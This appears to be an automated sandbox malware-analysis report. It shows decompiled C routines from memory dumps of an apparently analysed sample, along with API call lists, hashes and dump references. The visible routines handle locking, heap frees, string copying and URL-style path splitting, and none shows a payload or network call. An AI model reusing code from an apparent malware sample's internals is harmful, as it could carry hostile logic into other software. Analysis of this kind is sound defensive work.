                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                    • Opcode ID: 46a90ab107dc4d9f6483ebe2ce89d78da7ac6d1f862b75f54745e9a8ad18c49d
                                                                                                                                                                                                    • Instruction ID: 834aa8b99cbf286ad0e726341f49460520b009388d014e527144d4b1b4d0382f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46a90ab107dc4d9f6483ebe2ce89d78da7ac6d1f862b75f54745e9a8ad18c49d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F058B1B00284EBEB109F68FA89F0637E8EF18740B01400AF4A6D6240C338EC42DB18
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                    			E04F659EE() {
                                                                                                                                                                                                    				void* _v0;
                                                                                                                                                                                                    				void** _t3;
                                                                                                                                                                                                    				void** _t5;
                                                                                                                                                                                                    				void** _t7;
                                                                                                                                                                                                    				void** _t8;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t3 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t5 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    				_t10 =  *_t7;
                                                                                                                                                                                                    				if(_t10 != 0 && _t10 != 0x4f6e836) {
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _t10);
                                                                                                                                                                                                    					_t7 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *_t7 = _v0;
                                                                                                                                                                                                    				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                    				__imp__(_t8);
                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x04f659ee
                                                                                                                                                                                                    0x04f659f7
                                                                                                                                                                                                    0x04f65a07
                                                                                                                                                                                                    0x04f65a07
                                                                                                                                                                                                    0x04f65a0c
                                                                                                                                                                                                    0x04f65a11
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f65a01
                                                                                                                                                                                                    0x04f65a01
                                                                                                                                                                                                    0x04f65a13
                                                                                                                                                                                                    0x04f65a18
                                                                                                                                                                                                    0x04f65a1c
                                                                                                                                                                                                    0x04f65a2f
                                                                                                                                                                                                    0x04f65a35
                                                                                                                                                                                                    0x04f65a35
                                                                                                                                                                                                    0x04f65a3e
                                                                                                                                                                                                    0x04f65a40
                                                                                                                                                                                                    0x04f65a44
                                                                                                                                                                                                    0x04f65a4a

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(05929570), ref: 04F659F7
                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,04F65068), ref: 04F65A01
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,04F65068), ref: 04F65A2F
                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(05929570), ref: 04F65A44
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                    • Opcode ID: 3f6486b7aff5abea17f37c6ba6833b04420ff57945db42057c49d6954d123d97
                                                                                                                                                                                                    • Instruction ID: 74ebea3eac220942cbecad49966e8dd087098e62e9e0459b3140677094c8f639
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6486b7aff5abea17f37c6ba6833b04420ff57945db42057c49d6954d123d97
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF0D475B01285EFEB18CF68FA9AA2537E5EB28715B054109E497E7250C73CEC41DE11
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E04F6552D(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    				int _t42;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t17 = __eax;
                                                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                                                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                    				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                    				_t28 = _t2;
                                                                                                                                                                                                    				_t34 = E04F68D59(_t2);
                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                    					_t30 = E04F68D59(_t28);
                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                    						E04F6677C(_t34);
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t39 = _a4;
                                                                                                                                                                                                    						_t22 = E04F6A89A(_t39);
                                                                                                                                                                                                    						_v8 = _t22;
                                                                                                                                                                                                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                    							_a4 = _t39;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t26 = _t22 + 2;
                                                                                                                                                                                                    							_a4 = _t22 + 2;
                                                                                                                                                                                                    							_t22 = E04F6A89A(_t26);
                                                                                                                                                                                                    							_v8 = _t22;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                    							__imp__(_t34, _a4);
                                                                                                                                                                                                    							 *_t30 = 0x2f;
                                                                                                                                                                                                    							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t42 = _t22 - _a4;
                                                                                                                                                                                                    							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                    							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                    							__imp__(_t30, _v8);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_a8 = _t34;
                                                                                                                                                                                                    						_t37 = 1;
                                                                                                                                                                                                    						 *_a12 = _t30;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                    			}














                                                                                                                                                                                                    0x04f6552d
                                                                                                                                                                                                    0x04f65537
                                                                                                                                                                                                    0x04f65539
                                                                                                                                                                                                    0x04f6553f
                                                                                                                                                                                                    0x04f6553f
                                                                                                                                                                                                    0x04f65548
                                                                                                                                                                                                    0x04f6554c
                                                                                                                                                                                                    0x04f65558
                                                                                                                                                                                                    0x04f6555c
                                                                                                                                                                                                    0x04f655d0
                                                                                                                                                                                                    0x04f6555e
                                                                                                                                                                                                    0x04f6555e
                                                                                                                                                                                                    0x04f65562
                                                                                                                                                                                                    0x04f65567
                                                                                                                                                                                                    0x04f6556c
                                                                                                                                                                                                    0x04f65586
                                                                                                                                                                                                    0x04f65575
                                                                                                                                                                                                    0x04f65575
                                                                                                                                                                                                    0x04f65579
                                                                                                                                                                                                    0x04f6557c
                                                                                                                                                                                                    0x04f65581
                                                                                                                                                                                                    0x04f65581
                                                                                                                                                                                                    0x04f6558b
                                                                                                                                                                                                    0x04f655b3
                                                                                                                                                                                                    0x04f655b9
                                                                                                                                                                                                    0x04f655bc
                                                                                                                                                                                                    0x04f6558d
                                                                                                                                                                                                    0x04f6558f
                                                                                                                                                                                                    0x04f65597
                                                                                                                                                                                                    0x04f655a2
                                                                                                                                                                                                    0x04f655a7
                                                                                                                                                                                                    0x04f655a7
                                                                                                                                                                                                    0x04f655c3
                                                                                                                                                                                                    0x04f655ca
                                                                                                                                                                                                    0x04f655cb
                                                                                                                                                                                                    0x04f655cb
                                                                                                                                                                                                    0x04f6555c
                                                                                                                                                                                                    0x04f655db

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04F68CFF,?,?,?,?,00000102,04F63331,?,?,00000000), ref: 04F65539
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                      • Part of subcall function 04F6A89A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04F65567,00000000,00000001,00000001,?,?,04F68CFF,?,?,?,?,00000102), ref: 04F6A8A8
                                                                                                                                                                                                      • Part of subcall function 04F6A89A: StrChrA.SHLWAPI(?,0000003F,?,?,04F68CFF,?,?,?,?,00000102,04F63331,?,?,00000000,00000000), ref: 04F6A8B2
                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F68CFF,?,?,?,?,00000102,04F63331,?), ref: 04F65597
                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F655A7
                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F655B3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3767559652-0
                                                                                                                                                                                                    • Opcode ID: 639203bca9d9bf3f4d4249baee01b6ddd928dfd6f27415e87b2a2fa7bed739e7
                                                                                                                                                                                                    • Instruction ID: b3d1bc99179843cdd0733929fad5241908d9bbd07f87702382aa5871a4ee3ccf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 639203bca9d9bf3f4d4249baee01b6ddd928dfd6f27415e87b2a2fa7bed739e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7921B772900255FFDB026FB5EC48A9E7FBADF06298B044155F906AB211E735ED0287B1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F61FE0(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                    				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                    				_t18 = E04F68D59(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                    				_v8 = _t18;
                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                    					_t34 = _t29 + _t29;
                                                                                                                                                                                                    					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                    					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x04f61ff5
                                                                                                                                                                                                    0x04f61ff9
                                                                                                                                                                                                    0x04f62003
                                                                                                                                                                                                    0x04f62008
                                                                                                                                                                                                    0x04f6200d
                                                                                                                                                                                                    0x04f6200f
                                                                                                                                                                                                    0x04f62017
                                                                                                                                                                                                    0x04f6201c
                                                                                                                                                                                                    0x04f6202a
                                                                                                                                                                                                    0x04f6202f
                                                                                                                                                                                                    0x04f62039

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0592936C,?,04F65D0B,004F0053,0592936C,?,?,?,?,?,?,04F62885), ref: 04F61FF0
                                                                                                                                                                                                    • lstrlenW.KERNEL32(04F65D0B,?,04F65D0B,004F0053,0592936C,?,?,?,?,?,?,04F62885), ref: 04F61FF7
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04F65D0B,004F0053,0592936C,?,?,?,?,?,?,04F62885), ref: 04F62017
                                                                                                                                                                                                    • memcpy.NTDLL(751469A0,04F65D0B,00000002,00000000,004F0053,751469A0,?,?,04F65D0B,004F0053,0592936C), ref: 04F6202A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2411391700-0
                                                                                                                                                                                                    • Opcode ID: a01e266bbdec42f2e78263d60c8349d95af2f028557177a35c21bd7284a0a5c8
                                                                                                                                                                                                    • Instruction ID: 1383fa093d2ace3a283d33124c6aa7d7569c511c61f4ae71faf77de5b4d16804
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a01e266bbdec42f2e78263d60c8349d95af2f028557177a35c21bd7284a0a5c8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABF04976900119BBCF11EFE9DC84C9F7BACEF082987054066EA09D7211E671EA159BA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,00000000,04F61F32,616D692F,00000000), ref: 04F6277F
                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 04F62787
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 04F6279E
                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 04F627A9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 74227042-0
                                                                                                                                                                                                    • Opcode ID: aacada0c890e7d9fe100b470c677606ddc20d1e3747b3ffd5eceadeb16522f57
                                                                                                                                                                                                    • Instruction ID: e1385c92f7fb1e5883c2d4621d972e0530810cd28b2b20b2d4d32fb734f796f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aacada0c890e7d9fe100b470c677606ddc20d1e3747b3ffd5eceadeb16522f57
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7E09A33805665FB87126BA4BC08C8FBBA9FF88260B054916FAA4D3114CB35D8158BA2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%